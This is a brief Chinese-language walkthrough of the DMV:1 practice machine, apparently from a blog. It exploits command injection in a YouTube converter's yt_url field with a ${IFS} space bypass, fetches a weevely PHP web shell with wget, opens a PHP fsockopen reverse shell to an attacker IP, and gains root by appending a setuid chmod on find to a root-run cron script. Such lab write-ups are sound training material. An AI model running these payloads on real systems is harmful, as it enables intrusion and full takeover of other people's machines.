vulhub-DMV:1

扫描端口

22,80端口

这是一个Youtube视频在线转换工具

测试框中粘贴随机的 YouTube URL 后,我们点击转换按钮。单击拦截并将其打开。

这里我们得到一个Github链接在检查 Github 链接时,我们发现了有关此 Web 应用程序可以接受哪些命令句柄的选项。

执行一下发现它过滤空格

可以用用其他方式绕过,比如%0a、%0b、%09、${IFS}

yt_url=1;wget${IFS}192.168.44.143:8000/shell3.php;

这边咱们用weevely,学习个新姿势

python -m SimpleHTTPServer 8080

yt_url=1;wget${IFS}http://192.168.1.112:8080/shell.php;

或者直接上传一个.sh文件后,利用命令执行直接执行文件,反弹shell也可以

用上传shell.php同样的方法将pspy64传到靶机上,但是weevely的shell无法运行成功pspy64,无奈使用php弹了一个shell到攻击机上,发现可以运行成功

php -r '$sock=fsockopen("192.168.56.177",7777);exec("/bin/sh -i <&3 >&3 2>&3");'

可以看到root权限执行了clean.sh

直接写入反弹shell,kali监听,等待一会就提权了

echo "chmod u+s /usr/bin/find" >> clean.sh 过一段时间执行

然后使用find命令的-exec选项进行提权

find . -exec /bin/bash -p \;

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值